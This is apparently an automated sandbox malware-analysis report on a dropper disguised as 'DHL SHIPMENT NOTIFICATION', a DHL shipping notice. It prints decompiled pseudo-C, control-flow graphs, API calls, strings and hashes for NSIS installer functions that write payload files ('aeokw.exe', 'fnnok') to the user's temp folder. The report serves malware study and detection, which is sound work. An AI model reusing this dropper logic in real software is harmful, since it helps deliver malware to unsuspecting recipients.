                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                        • API String ID: 2803837635-3642876044
                        • Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                        • Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
                        • Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                        • Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 454 40176f-401794 call 402da6 call 405fb4 459 401796-40179c call 40666e 454->459 460 40179e-4017b0 call 40666e call 405f3d lstrcatW 454->460 466 4017b5-4017b6 call 4068f5 459->466 460->466 469 4017bb-4017bf 466->469 470 4017c1-4017cb call 4069a4 469->470 471 4017f2-4017f5 469->471 478 4017dd-4017ef 470->478 479 4017cd-4017db CompareFileTime 470->479 473 4017f7-4017f8 call 406139 471->473 474 4017fd-401819 call 40615e 471->474 473->474 481 40181b-40181e 474->481 482 40188d-4018b6 call 4056d0 call 403377 474->482 478->471 479->478 483 401820-40185e call 40666e * 2 call 4066ab call 40666e call 405cce 481->483 484 40186f-401879 call 4056d0 481->484 496 4018b8-4018bc 482->496 497 4018be-4018ca SetFileTime 482->497 483->469 517 401864-401865 483->517 494 401882-401888 484->494 498 402c33 494->498 496->497 500 4018d0-4018db FindCloseChangeNotification 496->500 497->500 502 402c35-402c39 498->502 503 4018e1-4018e4 500->503 504 402c2a-402c2d 500->504 506 4018e6-4018f7 call 4066ab lstrcatW 503->506 507 4018f9-4018fc call 4066ab 503->507 504->498 511 401901-4023a2 call 405cce 506->511 507->511 511->502 511->504 517->494 519 401867-401868 517->519 519->484
                        C-Code - Quality: 77%
                        			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FB4( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\U";
				if(_t35 == 0) {
					lstrcatW(E00405F3D(E0040666E(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					E0040666E();
				}
				E004068F5(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004069A4(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406139(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056D0(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8b28;
						goto L32;
					} else {
						E0040666E(0x40b5f8, _t83);
						E0040666E(_t83, _t81);
						E004066AB(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040666E(_t83, 0x40b5f8);
						_t64 = E00405CCE("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056D0();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056D0(0xffffffea,  *(_t86 - 8));
				 *0x7a8b54 =  *0x7a8b54 + 1;
				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x7a8b54 =  *0x7a8b54 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CCE();
					goto L29;
				}
				goto L33;
			}


















                        0x0040176f
                        0x00401776
                        0x00401782
                        0x00401785
                        0x0040178a
                        0x0040178d
                        0x00401794
                        0x004017b0
                        0x00401796
                        0x00401797
                        0x00401797
                        0x004017b6
                        0x004017bb
                        0x004017bb
                        0x004017bf
                        0x004017c2
                        0x004017c7
                        0x004017c9
                        0x004017cb
                        0x004017d0
                        0x004017d0
                        0x004017db
                        0x004017db
                        0x004017ec
                        0x004017ee
                        0x004017ee
                        0x004017ef
                        0x004017ef
                        0x004017f2
                        0x004017f5
                        0x004017f8
                        0x004017f8
                        0x004017ff
                        0x0040180e
                        0x00401813
                        0x00401816
                        0x00401819
                        0x00000000
                        0x00000000
                        0x0040181b
                        0x0040181e
                        0x00401874
                        0x00401879
                        0x004015b6
                        0x0040292e
                        0x0040292e
                        0x00402c2a
                        0x00402c2d
                        0x00402c2d
                        0x00000000
                        0x00401820
                        0x00401826
                        0x0040182d
                        0x0040183a
                        0x00401845
                        0x0040185b
                        0x0040185b
                        0x0040185e
                        0x00000000
                        0x00401864
                        0x00401864
                        0x00401865
                        0x00401882
                        0x00402c33
                        0x00402c33
                        0x00402c33
                        0x00401867
                        0x00401867
                        0x00401868
                        0x00401493
                        0x0040239d
                        0x0040239d
                        0x0040239d
                        0x00401865
                        0x0040185e
                        0x00402c35
                        0x00402c39
                        0x00402c39
                        0x00401892
                        0x00401897
                        0x004018a5
                        0x004018aa
                        0x004018b0
                        0x004018b4
                        0x004018b6
                        0x004018be
                        0x004018ca
                        0x004018b8
                        0x004018b8
                        0x004018bc
                        0x00000000
                        0x00000000
                        0x004018bc
                        0x004018d3
                        0x004018d9
                        0x004018db
                        0x00000000
                        0x004018e1
                        0x004018e1
                        0x004018e4
                        0x004018fc
                        0x004018e6
                        0x004018e9
                        0x004018f2
                        0x004018f2
                        0x00401901
                        0x00401906
                        0x00402398
                        0x00000000
                        0x00402398
                        0x00000000

                        APIs
                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                        • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,00000000,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                          • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                          • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                          • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                        • API String ID: 1941528284-2386481783
                        • Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                        • Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
                        • Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                        • Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040347F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 520 40347f-4034a7 GetTickCount 521 4035d7-4035df call 40302e 520->521 522 4034ad-4034d8 call 4035fe SetFilePointer 520->522 527 4035e1-4035e5 521->527 528 4034dd-4034ef 522->528 529 4034f1 528->529 530 4034f3-403501 call 4035e8 528->530 529->530 533 403507-403513 530->533 534 4035c9-4035cc 530->534 535 403519-40351f 533->535 534->527 536 403521-403527 535->536 537 40354a-403566 call 406b96 535->537 536->537 538 403529-403549 call 40302e 536->538 543 4035d2 537->543 544 403568-403570 537->544 538->537 545 4035d4-4035d5 543->545 546 403572-40357a call 406210 544->546 547 403593-403599 544->547 545->527 551 40357f-403581 546->551 547->543 548 40359b-40359d 547->548 548->543 550 40359f-4035b2 548->550 550->528 552 4035b8-4035c7 SetFilePointer 550->552 553 403583-40358f 551->553 554 4035ce-4035d0 551->554 552->521 553->535 555 403591 553->555 554->545 555->550
                        C-Code - Quality: 93%
                        			E0040347F(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
				 *0x7a8aac = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035FE( *0x79f744);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x79f740 = _t33;
				 *0x79f730 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x79f738 -  *0x79f744;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E004035E8(0x793730, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x79f744 =  *0x79f744 + _t30;
					 *0x40ce68 = 0x793730;
					 *0x40ce6c = _t30;
					L6:
					L6:
					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce70 = 0x78b730;
					 *0x40ce74 = 0x8000;
					if(E00406B96(?str?) < 0) {
						goto L20;
					}
					_t35 =  *0x40ce70; // 0x7923e3
					_t36 = _t35 - 0x78b730;
					if(_t36 == 0) {
						__eflags =  *0x40ce6c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x79f734;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t36;
					_t48 =  *0x40ce6c; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}













                        0x0040348f
                        0x004034a2
                        0x004034a7
                        0x004035d7
                        0x004035d9
                        0x00000000
                        0x004035df
                        0x004034b3
                        0x004034c6
                        0x004034cc
                        0x004034d2
                        0x004034dd
                        0x004034e2
                        0x004034e7
                        0x004034ef
                        0x004034f1
                        0x004034f1
                        0x004034fa
                        0x00403501
                        0x00000000
                        0x00000000
                        0x00403507
                        0x0040350d
                        0x00403513
                        0x00000000
                        0x00403519
                        0x0040351f
                        0x0040353f
                        0x00403544
                        0x00403549
                        0x0040354f
                        0x00403555
                        0x00403566
                        0x00000000
                        0x00000000
                        0x00403568
                        0x0040356e
                        0x00403570
                        0x00403593
                        0x00403599
                        0x00000000
                        0x00000000
                        0x0040359b
                        0x0040359d
                        0x00000000
                        0x00000000
                        0x0040359f
                        0x0040359f
                        0x004035b2
                        0x00000000
                        0x00000000
                        0x004035c1
                        0x00000000
                        0x004035c1
                        0x0040357a
                        0x00403581
                        0x004035ce
                        0x004035d4
                        0x004035d4
                        0x00000000
                        0x004035d4
                        0x00403583
                        0x00403589
                        0x0040358f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004035d2
                        0x004035d2
                        0x00000000
                        0x004035d2
                        0x00000000

                        APIs
                        • GetTickCount.KERNEL32 ref: 00403493
                          • Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
                        • SetFilePointer.KERNELBASE(?,00000000,00000000,Ody,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FilePointer$CountTick
                        • String ID: 07y$Ody$#y
                        • API String ID: 1092082344-2923550413
                        • Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                        • Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
                        • Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                        • Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004069CB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 556 4069cb-4069eb GetSystemDirectoryW 557 4069ed 556->557 558 4069ef-4069f1 556->558 557->558 559 406a02-406a04 558->559 560 4069f3-4069fc 558->560 562 406a05-406a38 wsprintfW LoadLibraryExW 559->562 560->559 561 4069fe-406a00 560->561 561->562
                        C-Code - Quality: 100%
                        			E004069CB(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                        0x004069e2
                        0x004069eb
                        0x004069ed
                        0x004069ed
                        0x004069f1
                        0x00406a04
                        0x004069fe
                        0x004069fe
                        0x004069fe
                        0x00406a1d
                        0x00406a31
                        0x00406a38

                        APIs
                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                        • wsprintfW.USER32 ref: 00406A1D
                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: DirectoryLibraryLoadSystemwsprintf
                        • String ID: %s%S.dll$UXTHEME$\
                        • API String ID: 2200240437-1946221925
                        • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                        • Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
                        • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                        • Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405B9F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 563 405b9f-405bea CreateDirectoryW 564 405bf0-405bfd GetLastError 563->564 565 405bec-405bee 563->565 566 405c17-405c19 564->566 567 405bff-405c13 SetFileSecurityW 564->567 565->566 567->565 568 405c15 GetLastError 567->568 568->566
                        C-Code - Quality: 100%
                        			E00405B9F(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                        0x00405baa
                        0x00405bae
                        0x00405bb1
                        0x00405bb7
                        0x00405bbb
                        0x00405bbf
                        0x00405bc7
                        0x00405bce
                        0x00405bd4
                        0x00405bdb
                        0x00405be2
                        0x00405bea
                        0x00405bec
                        0x00000000
                        0x00405bec
                        0x00405bf6
                        0x00405bfd
                        0x00405c13
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405c15
                        0x00405c19

                        APIs
                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                        • GetLastError.KERNEL32 ref: 00405BF6
                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
                        • GetLastError.KERNEL32 ref: 00405C15
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 3449924974-3081826266
                        • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                        • Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
                        • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                        • Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040618D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 569 40618d-406199 570 40619a-4061ce GetTickCount GetTempFileNameW 569->570 571 4061d0-4061d2 570->571 572 4061dd-4061df 570->572 571->570 573 4061d4 571->573 574 4061d7-4061da 572->574 573->574
                        C-Code - Quality: 100%
                        			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                        0x00406193
                        0x00406199
                        0x0040619a
                        0x0040619a
                        0x0040619f
                        0x004061a0
                        0x004061a3
                        0x004061a8
                        0x004061ab
                        0x004061b5
                        0x004061c2
                        0x004061c6
                        0x004061ce
                        0x00000000
                        0x00000000
                        0x004061d2
                        0x00000000
                        0x004061d4
                        0x004061d4
                        0x004061d4
                        0x004061d7
                        0x004061da
                        0x004061da
                        0x004061dd
                        0x00000000

                        APIs
                        • GetTickCount.KERNEL32 ref: 004061AB
                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
